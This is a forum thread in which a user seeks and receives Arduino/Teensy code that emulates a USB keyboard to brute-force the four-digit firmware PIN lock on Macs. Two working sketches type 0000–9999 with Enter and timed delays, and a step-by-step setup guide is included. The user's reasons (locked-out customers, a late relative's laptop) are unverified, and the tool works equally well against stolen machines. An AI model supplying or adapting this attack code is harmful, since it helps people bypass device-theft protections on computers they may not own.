I have a Arduino Micro with USB keyboard emulation. Trying to program a simple 0001-9999 counter to brute force password crack on a Mac. ( I sometimes have customers that don't know their passwords.)
Simple 0001-9999 with random delays and a after each number.
I have code for a Tweensy but it only partially translates- (no )
Is this code already on the site somewhere or could someone give me some simple coding lessons so I can adapt the Teenzy code.
Thanks.
JB
oldmactech:
Tweensy ... Teenzy
What the heck is a Tweensy? A pre-teen Syrian? And what is a Teenzy? Kid's toy of some sort?
Trying to program a simple 0001-9999 counter to brute force password crack on a Mac.
The Mac does not lock-out after N attempts?
I wouldn't expect the OS to just let you keep trying different numbers until you hit one that works. There are other well known ways to recover from a lost password, using the OS installer or a bootable Linux image. Wouldn't they be quicker and easier?
Teensy is an Arduino. Probably types better than I do.
With an external keyboard connected via USB, I can type and enter all the passwords I want, not locked out.
OS installer will not remove this type of password nor will bootable linux image.
Thanks.
JB
oldmactech:
I have code for a Teensy but it only partially translates- (no )
What code? Please use
</mark> <mark>[code]</mark> <mark>
</mark> <mark>[/code]</mark> <mark>
tags if you post the actual code instead of a link.
#include <usb_keyboard.h>
// This code is licensed under Apache 2.0 License
// http://www.apache.org/licenses/LICENSE-2.0.txt
// Limitation of Liability. In no event and under no legal theory,
// whether in tort (including negligence), contract, or otherwise,
// unless required by applicable law (such as deliberate and grossly
// negligent acts) or agreed to in writing, shall any Contributor be
// liable to You for damages, including any direct, indirect, special,
// incidental, or consequential damages of any character arising as a
// result of this License or out of the use or inability to use the
// Work (including but not limited to damages for loss of goodwill,
// work stoppage, computer failure or malfunction, or any and all
// other commercial damages or losses), even if such Contributor
// has been advised of the possibility of such damages.
// This code is indented for people who are not able to contact
// apple support and I am in no way liable for any damage or
// problems this code might cause.
const int ledPin = 13; // choose the pin for the LED
int counter = 0;
int fakecounter = counter;
char pin[]="xxxx";
void setup() {
pinMode(ledPin, OUTPUT); // declare LED as output
delay(10000);
}
void loop(){
keyboard_modifier_keys = 0;
if (counter <= 9999){
delay(8000);
digitalWrite(ledPin, LOW);
delay(5500);
digitalWrite(ledPin, HIGH);
sprintf(pin, "%04d", fakecounter);
//sending first digit
Keyboard.press(pin[0]);
delay(450);
Keyboard.release(pin[0]);
delay(420);
//sending second digit
Keyboard.press(pin[1]);
delay(398);
Keyboard.release(pin[1]);
delay(510);
//sending third digit
Keyboard.press(pin[2]);
delay(421);
Keyboard.release(pin[2]);
delay(423);
//sending forth digit
Keyboard.press(pin[3]);
delay(430);
Keyboard.release(pin[3]);
delay(525);
//sending enter
Keyboard.press(KEY_ENTER);
delay(305);
Keyboard.release(KEY_ENTER);
}
//reached 4 digit PIN max value
if (counter > 9999){
for (int blinkies = 0; blinkies < 8; blinkies++) {
digitalWrite(ledPin, HIGH);
delay(20);
digitalWrite(ledPin, LOW);
delay(200);
}
delay(6000);
}
++counter;
fakecounter = counter;
}
Moderator edit: Please NICELY use code tags when posting code.
oldmactech:
I have code for a Tweensy but it only partially translates- (no )
I guess it's the BIOS code you're trying to crack.
The code you posted looks as if it would do the sort of thing you're trying to do although I don't quite follow what you're doing with fakecounter. What's the problem with that code? Does it compile? Does it do anything? What's it doing, or not doing, wrong?
Also, which usb_keyboard library are you using?
I'm not a programmer- got the code off a Teensy site.
Pasted into a sketch and ran Verify.
Error message is as follows:
Scope
Error: 'Keyboard' was not declared in this scope
Error: 'Key_Enter was not declared in this scope.
I simply deleted the lines that were highlighted as Errors and uploaded it.
When connect the Arduino, it does act as a keyboard-after a few seconds Tx LED flashes 6 times and the first 4 numbers appear in the text box (0000). After a slight delay TX flashes 6 more times and the next 4 numbers appear (0001). Repeats as it should.
None of the numbers are followed by a .
Last night I set a low numbered Admin Password on my Mac and if I physically pressed return after each number - when it reached the password (0005), it functioned perfectly.
At the least I need to set a after each number?
Thanks.
Jb
Those errors suggest that the usb_keyboard library is not installed or not installed correctly.
Where did you get it from? Where have you installed it? If it is installed correctly then it should appear in the list of libraries in the sketch / import library menu, and file / examples menu will include this library, and the standard examples under there will compile and run OK.
I just cut an pasted it to the Arduino software for Mac. Ran "Verify" to get those error messages.
I guess from your response I missed a step or two?
Jb
You're using usb_keyboard.h, and presumably usb_keyboard.cpp.
Are these files present on your machine? If so, where are they and where did they come from?
Not finding either file on the machine.
If you're trying to bruteforce the EFI password, good luck, those tend to be quite long, contain numbers, uppercase, lower case, and special characters (especially on Macbooks that have been "liberated" from educational institutions). The standard is about 30 characters. There are utilities to reset the EFI password. If you're trying to log into the Mac itself, there are boot disks that let you brute-force or reset the password.
Trying to brute-force a password in place is just dumb. Your little microprocessor is still going to be running numbers after the sun consumes the earth, its barely possible on a high-end x86 machine. Its much better to grab the encrypted passwords off the device and brute-force them on a machine you own (or using a cloud computing service).
Whats your reasoning for this? The EFI password doesn't protect any data, so theres no reason why you shouldn't just back up the files on the machine and reset the password with a new OS install.
oldmactech:
I simply deleted the lines that were highlighted as Errors and uploaded it.
Wow! That's quite a sneaky technique! 
Just did a little more research. Apparently the utilities that we use to reset EFI passwords aren't available to the public. Thats moronic, even by Apple standards. So...pray you have one with a PIN and not a 30 character alphanumeric password, I guess.
Ok, so I don't know much about programming but I know a significant amount about Macs (Apple Certified Tech). This brute force crack is for 2012 And newer MacBook Pros only. The previous ones were relatively simple to unlock.
The locking " feature is done via a Pin #. It is 4 digits. There apparently is also a 6 digit version for iCloud . Cracking the pin is basically as simple as entering a four digit pin (0000-9999) followed by a until the correct number is landed on. It is made more complicated in that the keyboard input need to "wait" long enough to emulate human input. The input slows significantly after the first 5 tries.
Before you assume this is some sort of criminal enterprise, my motivation is to correct a hole in The way Apple handles registration. Currently, when you buy a new Mac you are required to register it with an Apple ID. Apparently the Apple ID (email address/password) stays with the computer indefinitely even if the Admin password is changed. I have has several customers that In trying to upgrade to Mavericks 10.9 were prompted to enter an Apple ID that was not their own although the HD had been wiped previously. These were legit computers, one even refurb'd from Apple.
My current motivation is a little more personal. One of my best friends mother passed suddenly. The survivors found her laptop but it is now locked since they don't have her password. Normally Apple would unlock it with proof of purchase presented in store. Since the owner is deceased, Apple now says it would only accept a court order signed by a judge to unlock it.
The code I "borrowed" is known to function on a Teensy.- (Arduino clone I think?). My Arduino Micro does keyboard emulation, should be able to make it work .
Any help is greatly appreciated.
Jb
Paul__B:
oldmactech:
I simply deleted the lines that were highlighted as Errors and uploaded it.Wow! That's quite a sneaky technique!
Worth a try...
Funny thing, I set an administrator password (0005) on another Mac, and ran the code and it opened up when it got to 0005. Trouble is, I had to physically hit as each number was created. So, mostly what it needs is code to generate .
What you need is to locate and install the usb keyboard library that the sketch is intended to use.
I agree. How do I?
Thanks.
Jb
What I did...
• Install the latest Arduino IDE 1.0
• Install Teensyduino
• Start the Arduino IDE
• Ensure the correct board and serial port are selected
• Test an empty sketch to ensure uploading works
• Change USB Type from Serial to Mouse + Keyboard
• Upload this...
void setup()
{
}
void loop()
{
static unsigned short pin;
static char buffer[5];
if ( pin < 10000 )
{
sprintf( buffer, "%04hu", pin );
Keyboard.println( buffer );
++pin;
delay( 10000 );
}
else
{
// Indicate finish (e.g. flash the on-board LED)
}
}
• After determining it did what I wanted, remove the delay
Bear in mind, you may have to include a delay to give the Mac time to respond. Good luck.